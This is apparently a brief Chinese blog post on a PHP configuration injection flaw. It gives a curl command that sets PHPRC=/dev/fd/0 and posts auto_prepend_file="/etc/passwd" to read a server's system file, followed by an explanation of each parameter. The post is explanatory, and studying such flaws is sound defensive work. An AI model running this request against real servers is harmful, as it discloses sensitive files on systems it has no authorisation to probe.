【网络安全】PHP配置注入漏洞

秋说2024-09-15 23:38

未经许可,不得转载。

文章目录

正文

前提:通过探测等方式发现某个 PHP 文件存在 PHPRC 参数:

bash 复制代码 
curl "https://xxx.com/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

PHPRC 用于指定 PHP 配置文件(php.ini)的路径。通过将其设置为 /dev/fd/0,我们尝试让服务器从标准输入读取 PHP 配置。

--data-binary 参数以二进制格式发送数据,适合传递原始数据而非标准表单参数。

auto_prepend_file 是 PHP 配置选项,可以在执行脚本前自动包含指定文件。这里我们设置为 /etc/passwd,试图读取系统敏感信息。

漏洞证明如下:

相关推荐
ooseabiscuit6 小时前
Laravel 1.x:揭秘PHP框架的起源与设计
php·laravel
m0_738120726 小时前
ctfshow靶场SSRF部分——基础绕过到协议攻击解题思路与技巧(一)
服务器·前端·网络·安全·php
幽络源小助理8 小时前
最新短网址系统源码 分用户链接 - 幽络源免费源码分享
前端·php
ooseabiscuit9 小时前
Laravel5
android·php·laravel
wanhengidc10 小时前
BGP服务器的功能是什么
运维·服务器·安全·web安全·智能手机
神仙别闹13 小时前
基于PHP+MySQL实现在线考试系统
开发语言·mysql·php
small_white_robot14 小时前
idek-2022 web 全wp——持续更新
开发语言·前端·javascript·网络·安全·web安全·网络安全
棒棒的唐14 小时前
配置 VSCode 的 PHP Intelephense 插件,去掉因php版本不同导至的红色波浪线误判
ide·vscode·php
Mike117.15 小时前
GBase 8a DBLink 查询的落地边界和排查细节
开发语言·php
kft131416 小时前
文件上传漏洞:我是如何绕过WAF实现getshell的
web安全
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04【AI】2026 年具身智能模型和世界模型总结05零基础教你claude code 接入 deepseek V406Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)07codex app每次打开重连5次Reconnecting问题解决08要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法09裂开!ChatGPT 居然开始要手机号验证,附详细解决方法10Windows端Codex接入第三方模型(DeekSeek,BaiLian)